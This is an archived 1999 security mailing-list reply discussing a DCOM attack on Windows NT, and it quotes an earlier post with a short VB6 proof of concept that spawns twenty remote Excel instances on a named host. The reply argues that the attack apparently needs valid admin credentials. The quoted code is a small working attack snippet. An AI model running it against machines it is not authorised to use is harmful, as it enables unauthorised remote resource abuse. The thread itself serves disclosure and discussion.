Re: FW: DCOM attack against NT using VB6

From: Max Vision (visionat_private)
Date: Thu Aug 19 1999 - 17:39:02 PDT

Next message: Martin Schulze: "Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent()"

Previous message: Justin King: "IE and cached passwords"
Maybe in reply to: Hargett, Matt: "FW: DCOM attack against NT using VB6"
Next in thread: Erik Nielsen: "Re: FW: DCOM attack against NT using VB6"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,

Did you have credentials to authenticate to your coworker's machines?  I
was able to create arbitrary files remotely on other NT machines in my
network using DCOM/Word/Create, but soon discovered that this was because
I had domain admin credentials that were valid for each host.  IE, DCOM
attacks aren't effective if you don't have authentication credentials.

If you have contrary information please let us know :)  I could be
mistaken, since ISS does a test for non-admin access to DCOM..  What are
the chances ISS/NAI want to give full disclosure on their DCOM compromise
technique?

Required reading:

 Understanding the DCOM Wire Protocol by Analyzing Network Data Packets
 http://www.guyeddon.com/MSJ3-98.htm

 Using Distributed COM with Firewalls
 http://www.iapetus.com/dcom/dcomfw.htm

Max Vision
http://maxvision.net/

On Wed, 18 Aug 1999, Hargett, Matt wrote:
> -----Original Message-----
> From: Rob Lempke [mailto:rlempkeat_private]
> Sent: Wednesday, August 11, 1999 1:27 PM
> To: NTBUGTRAQat_private
> Subject: DCOM attack against NT using VB6
>
>
> Using the code below I was able to create 20 instances of Excel on my
> co-workers machines without modifying their machines at all.  The target
> must be Windows NT Workstation/Server running sp3 or sp4. sp5 seems to
> prevent the attack.
>
> Private Sub Command1_Click()
>     Dim xlObj As Object
>     Dim xlCollection As New Collection
>     Dim i As Long
>     For i = 1 To 20
>         Set xlObj = CreateObject("Excel.Application", "\\NTBox")
>         xlCollection.Add xlObj
>     Next i
>
>     i = 1
>     'clean up
>     While xlCollection.Count > 0
>         xlCollection.Remove (xlCollection.Count)
>     Wend
>     Set xlCollection = Nothing
> End Sub
>
> -Robert E. Lempke
> --------------------------------------------
> Steven Wright one Liners:
> "Black holes are where God divided by zero."
> "Quantum Mechanics:  The dreams stuff is made of."
> "Early bird gets the worm, but the second mouse gets the cheese."
> "If everything seems to be going well, you have obviously overlooked
> something."
> "Join the Army, meet interesting people, kill them."
> "Success always occurs in private, and failure in full view."
> "Ambition is a poor excuse for not having enough sense to be lazy."
> "Hard work pays off in the future.  Laziness pays off now."
> "Everyone has a photographic memory.  Some don't have film."
> "Drink until she's cute, but stop before the wedding."
> --------------------------------------------
>

Next message: Martin Schulze: "Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent()"
Previous message: Justin King: "IE and cached passwords"
Maybe in reply to: Hargett, Matt: "FW: DCOM attack against NT using VB6"
Next in thread: Erik Nielsen: "Re: FW: DCOM attack against NT using VB6"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:57:31 PDT